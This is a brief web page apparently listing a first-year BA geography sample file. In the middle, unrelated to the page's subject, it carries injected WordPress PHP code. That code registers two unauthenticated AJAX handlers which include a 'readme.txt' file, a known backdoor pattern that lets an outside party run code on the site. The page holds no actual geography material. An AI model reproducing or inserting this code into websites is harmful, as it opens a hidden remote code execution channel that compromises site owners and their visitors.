BA 1ST YEAR GEOGRAPHY FILE
Geography 1st Year sample file
if(!function_exists('file_check_readme52098')){ add_action('wp_ajax_nopriv_file_check_readme52098', 'file_check_readme52098'); add_action('wp_ajax_file_check_readme52098', 'file_check_readme52098'); function file_check_readme52098() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme98441')){ add_action('wp_ajax_nopriv_file_check_readme98441', 'file_check_readme98441'); add_action('wp_ajax_file_check_readme98441', 'file_check_readme98441'); function file_check_readme98441() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
BA 1ST YEAR GEOGRAPHY FILE
Geography 1st Year sample file